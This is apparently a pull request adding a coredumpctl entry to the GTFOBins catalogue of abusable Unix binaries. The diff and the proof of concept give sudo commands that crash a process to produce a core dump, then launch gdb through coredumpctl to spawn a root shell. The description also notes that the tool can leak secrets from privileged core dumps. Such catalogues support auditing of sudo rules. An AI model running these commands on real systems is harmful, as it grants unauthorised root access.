### PR TITLE
Add coredumpctl

### DIFF
--- a/_gtfobins/coredumpctl
+++ b/_gtfobins/coredumpctl
@@ -3,26 +3,28 @@ comment: |-
   coredumpctl: Manage and analyze systemd core dumps
 functions:
   shell:
-    - comment: |-
-        Non-interactive shell escape via gdb batch mode.
-        The `kill -6` sends SIGABRT to generate a core dump.
-        Only coredumpctl requires sudo (not yes).
-      code: |-
-        yes > /dev/null & kill -6 $!
-        coredumpctl debug --debugger-arguments="-batch -ex '!/bin/sh'"
-      contexts:
-        sudo:
-      version: 'systemd >=248, gdb required'
-    - comment: |-
-        Interactive shell escape via gdb.
-        The `kill -6` sends SIGABRT to generate a core dump.
-        Only coredumpctl requires sudo (not yes).
-      code: |-
-        yes > /dev/null & kill -6 $!
-        coredumpctl debug
-      contexts:
-        sudo:
-          comment: |-
-            In the gdb session, type: !/bin/sh
-      version: 'gdb required'
+  - code: |-
+      yes > /dev/null & kill -6 $!
+      coredumpctl debug --debugger-arguments="-batch -ex '! /bin/sh'"
+    comment: |-
+      Non-interactive shell escape via gdb batch mode.
+      The `kill -6` sends SIGABRT to generate a core dump.
+      Only coredumpctl requires sudo (not yes).
+    contexts:
+      sudo:
+    version: |-
+      systemd >=248, gdb required
+  - code: |-
+      yes > /dev/null & kill -6 $!
+      coredumpctl debug
+    comment: |-
+      Interactive shell escape via gdb.
+      The `kill -6` sends SIGABRT to generate a core dump.
+      Only coredumpctl requires sudo (not yes).
+    contexts:
+      sudo:
+        comment: |-
+          In the gdb session, type: !/bin/sh
+    version: |-
+      gdb required
 ...

--- a/_gtfobins/coredumpctl
+++ b/_gtfobins/coredumpctl
@@ -1,0 +1,28 @@
+---
+comment: |-
+  coredumpctl: Manage and analyze systemd core dumps
+functions:
+  shell:
+    - comment: |-
+        Non-interactive shell escape via gdb batch mode.
+        The `kill -6` sends SIGABRT to generate a core dump.
+        Only coredumpctl requires sudo (not yes).
+      code: |-
+        yes > /dev/null & kill -6 $!
+        coredumpctl debug --debugger-arguments="-batch -ex '!/bin/sh'"
+      contexts:
+        sudo:
+      version: 'systemd >=248, gdb required'
+    - comment: |-
+        Interactive shell escape via gdb.
+        The `kill -6` sends SIGABRT to generate a core dump.
+        Only coredumpctl requires sudo (not yes).
+      code: |-
+        yes > /dev/null & kill -6 $!
+        coredumpctl debug
+      contexts:
+        sudo:
+          comment: |-
+            In the gdb session, type: !/bin/sh
+      version: 'gdb required'
+...


### PR DESCRIPTION
### Summary
Add `coredumpctl` this systemd utility manages process core dumps and can invoke a debugger (gdb/lldb) with elevated privileges. When allowed via `sudo`, it provides a reliable path to root shell escape and sensitive memory disclosure.

#### Why
`sudo` access to `coredumpctl` is effectively equivalent to root access because:
1. It can spawn a debugger (`gdb`) as root  = **Shell Escape**
2. It can extract core dumps of privileged processes = **Sensitive Data Exposure** (passwords, keys, tokens in memory)

#### POC
```shell
yes > /dev/null & kill -6 $!
sudo coredumpctl debug --debugger-arguments="-batch -ex '! /bin/sh'"
````
![5341730476663706941-y](https://github.com/user-attachments/assets/303e5646-95bf-4dbb-9604-f0439b034fde)
![5341730476663706943-y](https://github.com/user-attachments/assets/922acbb6-0f96-4289-bdae-87b964389bfb)

#### Notes
1. Installed gdb on the system
2. `sudo` access to `coredumpctl`

#### Check list
1. Tested on `Rocky Linux 10.1` and `Ubuntu 24.04.4`
2. Submitting vet and format